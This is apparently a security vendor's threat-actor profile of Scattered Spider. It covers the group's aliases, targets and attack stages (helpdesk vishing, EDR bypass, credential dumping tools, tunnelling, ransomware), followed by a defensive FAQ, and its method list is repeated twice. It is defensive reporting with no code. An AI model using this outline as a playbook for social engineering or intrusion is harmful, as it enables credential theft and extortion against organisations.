Scattered Spider
Scattered Spider is a financially motivated threat actor known for its sophisticated use of social engineering, identity abuse, and high-impact ransomware attacks. Active since early 2022, the group has evolved rapidly, targeting a wide range of industries across multiple countries.
The origin of Scattered Spider
Scattered Spider, also known by aliases such as Storm-0875, LUCR-3, Octo Tempest, Roasted 0ktapus, Scatter Swine, and UNC3944, is a prolific eCrime adversary active since early 2022. Believed to operate primarily out of Western countries, SCATTERED SPIDER is known for its high-impact financial attacks, particularly against high-revenue organizations. Their operations evolved from credential theft and SIM swapping to high-profile ransomware deployments, often with extortion as the final objective.
Early campaigns were focused on customer relationship management (CRM) and business-process outsourcing (BPO) firms. However, by April 2023, their operational scope broadened with the adoption of ransomware as their primary monetization tool. Despite arrests of suspected teenage members in 2024 by UK and U.S. law enforcement, the group remains active.
Countries targeted by
The group targets numerous countries across multiple continents. Notable examples include:
- United States, Canada, and Brazil in the Americas.
- United Kingdom, Germany, Italy, France, and Switzerland in Europe.
- South Korea, Japan, Singapore, India, and Australia in the Asia-Pacific region.
Industries targeted by Scattered Spider
Scattered Spider is notable for the breadth of industries it targets. These include:
- Telecommunications and Technology, particularly in its earlier campaigns.
- Retail, Financial Services, and Consumer Goods, which saw increased targeting as ransomware became central to their operations.
- A wide array of other sectors such as Manufacturing, Hospitality, Legal, Healthcare, Energy, and Cryptocurrency, indicating a non-discriminatory “big game hunting” approach focused on profitability.
Scattered Spider's Victims
While many victims remain unnamed due to the sensitive nature of incidents, it is confirmed that SCATTERED SPIDER primarily impacts:
- Fortune 500 companies
- High-revenue organizations
- Firms with access to sensitive user data and enterprise-scale infrastructure
Scattered Spider's attack method
Achieved through advanced social engineering tactics like smishing, vishing, and impersonation of IT helpdesks. Attackers exploit user trust to bypass authentication and gain entry.
They target accounts with elevated privileges, often focusing on IT, security, and C-suite personnel.
Use of custom malware (e.g., CS-Paralyzer), safe mode reboots, registry modification, and custom UEFI bootkits (like BlackLotus) to disable or bypass EDR/AV tools.
Harvested via phishing kits, Mimikatz, secretsdump.py, DCSync, and RAM captures.
Utilize legitimate tools and internal documentation to map the environment.
Through RDP, SSH, PSExec, and Azure commands; they exploit internal trust relationships.
Exfiltrate data from SharePoint, GSuite, internal file shares, and email repositories.
Deployment of malware or RMM tools like AnyDesk, ScreenConnect, and TightVNC.
Leverage tools like Chisel and Plink to tunnel data to remote servers or Telegram channels.
Encrypts data with ransomware like Alphv, DragonForce, Qilin, and RansomHub. Sometimes engages in double extortion.
Achieved through advanced social engineering tactics like smishing, vishing, and impersonation of IT helpdesks. Attackers exploit user trust to bypass authentication and gain entry.
They target accounts with elevated privileges, often focusing on IT, security, and C-suite personnel.
Use of custom malware (e.g., CS-Paralyzer), safe mode reboots, registry modification, and custom UEFI bootkits (like BlackLotus) to disable or bypass EDR/AV tools.
Harvested via phishing kits, Mimikatz, secretsdump.py, DCSync, and RAM captures.
Utilize legitimate tools and internal documentation to map the environment.
Through RDP, SSH, PSExec, and Azure commands; they exploit internal trust relationships.
Exfiltrate data from SharePoint, GSuite, internal file shares, and email repositories.
Deployment of malware or RMM tools like AnyDesk, ScreenConnect, and TightVNC.
Leverage tools like Chisel and Plink to tunnel data to remote servers or Telegram channels.
Encrypts data with ransomware like Alphv, DragonForce, Qilin, and RansomHub. Sometimes engages in double extortion.
TTPs used by Scattered Spider
How to Detect Scattered Spider with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack.
FAQs
What makes Scattered Spider different from other threat groups?
They uniquely blend social engineering, SIM swapping, and legitimate tools to bypass security mechanisms without needing zero-day exploits.
How do Scattered Spider gain initial access?
Primarily through smishing, vishing, and phishing to harvest credentials and persuade helpdesk agents to reset MFA/authentication.
What kind of malware or tools do Scattered Spider use?
They use a mix of commercial RMM tools (e.g., AnyDesk), ransomware (e.g., Alphv, Qilin), and custom utilities (e.g., CS-Paralyzer, Pumpy).
Are Scattered Spider's operations fully automated?
No. They use automated phishing kits, but most of their post-access operations rely on manual operator actions.
Can traditional MFA protect against Scattered Spider?
Not reliably. They use SIM swapping, MFA fatigue, and SSPR abuse to bypass MFA protections.
What detection techniques can help?
Deploying a robust Network Detection and Response (NDR) solution is critical to identifying and disrupting SCATTERED SPIDER’s activity. NDR can detect lateral movement, C2 communications, and unusual data exfiltration patterns across east-west and north-south traffic — even when adversaries use legitimate tools like RDP, PSExec, or encrypted tunnels (e.g., Chisel, Plink).
What are signs of compromise (IoCs)?
Use of file-sharing services (e.g., file.io), unusual RMM connections, and MFA resets initiated by IT helpdesk are common indicators.
How do Scattered Spider maintain persistence?
Via bootkits, scheduled tasks, new MFA enrollments, and disabled security tooling.
Do Scattered Spider use ransomware every time?
Not always. In some cases, they aim for data theft and extortion without ransomware deployment.